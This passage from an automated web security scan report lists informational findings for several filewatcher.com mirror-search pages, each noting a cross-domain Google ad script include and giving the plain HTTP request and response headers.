User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "T7qAUOSRE7/RDOQCpYTNlw"
Content-Length: 22340
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 753
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1014. http://www.filewatcher.com/m/aub-2.2.tbz.41730.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41730.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41730.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5PNCNxzwi0EQiEUbt/eodA"
Content-Length: 17924
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1015. http://www.filewatcher.com/m/aub-2.2.tbz.41785.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41785.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41785.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iJC8yIq2RhLHrrZ6uruGUw"
Content-Length: 21684
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1016. http://www.filewatcher.com/m/aub-2.2.tbz.41791.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41791.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41791.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "2S6/P4vFN9ega0P3lla96w"
Content-Length: 21930
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1017. http://www.filewatcher.com/m/aub-2.2.tbz.41797.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41797.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41797.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4iUqtkr0Iuy6/P9kJIHrBA"
Content-Length: 21291
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1018. http://www.filewatcher.com/m/aub-2.2.tbz.41884.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41884.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41884.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "lNVlSzLrNdmnOcHY3W2c0g"
Content-Length: 21804
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1019. http://www.filewatcher.com/m/aub-2.2.tbz.41893.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41893.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41893.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "hNOtmbYv+l9rlBfJYdLByw"
Content-Length: 21780
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1020. http://www.filewatcher.com/m/aub-2.2.tbz.41895.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41895.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41895.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zAEVqMLXz/1aYk+nBH7RGQ"
Content-Length: 21762
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1021. http://www.filewatcher.com/m/aub-2.2.tbz.41897.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41897.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41897.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XHgUPpwNlkOGmPMQ0rk2Tg"
Content-Length: 21579
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 773
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1022. http://www.filewatcher.com/m/aub-2.2.tbz.41898.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41898.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41898.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "6LB0z+qMl/0uVZEkPpFCDA"
Content-Length: 16403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1023. http://www.filewatcher.com/m/aub-2.2.tbz.41904.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41904.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41904.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WcqJbHTd54gNXNC5hgBlWg"
Content-Length: 21138
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1024. http://www.filewatcher.com/m/aub-2.2.tbz.41906.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41906.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41906.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "85k8CGq+qFamMFb1dh5TQg"
Content-Length: 21831
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 773
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1025. http://www.filewatcher.com/m/aub-2.2.tbz.41911.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41911.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41911.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XpLlN/7Z27CnJQ9DL7B7sA"
Content-Length: 22119
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1026. http://www.filewatcher.com/m/aub-2.2.tbz.41917.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41917.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41917.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "UejfL8jpUPEBK2PdkLB0Dg"
Content-Length: 21354
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1027. http://www.filewatcher.com/m/aub-2.2.tbz.41941.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.2.tbz.41941.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41941.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dj5qP6M2h12GcICElj1/vg"
Content-Length: 22083
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1028. http://www.filewatcher.com/m/aub.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.0.0.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.0.0.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m2W0T7atCBwRMiXTTWNtwQ"
Content-Length: 20467
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 762
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - FTP Directory Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1029. http://www.filewatcher.com/m/aub.1.2179.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.1.2179.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.1.2179.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "DG9YrqU0iVw29aWpeVHqqw"
Content-Length: 21470
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 769
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.1 - FTP Mirror Search (Downl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1030. http://www.filewatcher.com/m/aub.2.0.5.shar.124341.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.2.0.5.shar.124341.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.2.0.5.shar.124341.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wag9nuqX8Xjt29g4K3K5+A"
Content-Length: 15071
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

